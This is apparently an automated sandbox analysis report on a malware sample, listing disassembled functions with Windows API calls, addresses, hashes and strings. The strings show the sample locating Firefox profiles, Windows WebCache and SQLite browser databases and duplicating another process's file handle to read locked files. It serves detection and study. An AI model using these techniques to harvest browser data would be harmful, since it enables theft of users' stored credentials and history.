                                                                                                                                                Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2941347001-0
                                                                                                                                                • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403C09
                                                                                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                • API String ID: 3249829328-1174173950
                                                                                                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040A824
                                                                                                                                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 669240632-0
                                                                                                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                • String ID: "%s"
                                                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004087D6
                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                • memset.MSVCRT ref: 00408828
                                                                                                                                                • memset.MSVCRT ref: 00408840
                                                                                                                                                • memset.MSVCRT ref: 00408858
                                                                                                                                                • memset.MSVCRT ref: 00408870
                                                                                                                                                • memset.MSVCRT ref: 00408888
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2911713577-0
                                                                                                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmp
                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                • API String ID: 1475443563-3708268960
                                                                                                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                • memset.MSVCRT ref: 00414C87
                                                                                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                Strings
                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                • API String ID: 2705122986-2036018995
                                                                                                                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                                                                                • memset.MSVCRT ref: 0040E629
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Strings
                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                • API String ID: 3354267031-2114579845
                                                                                                                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                • API String ID: 2221118986-1725073988
                                                                                                                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@DeleteObject
                                                                                                                                                • String ID: r!A
                                                                                                                                                • API String ID: 1103273653-628097481
                                                                                                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$memcmp
                                                                                                                                                • String ID: $$8
                                                                                                                                                • API String ID: 2808797137-435121686
                                                                                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • too many columns on %s, xrefs: 00430763
                                                                                                                                                • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                • API String ID: 0-1445880494
                                                                                                                                                • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                                • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                                • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                                • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                                                Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
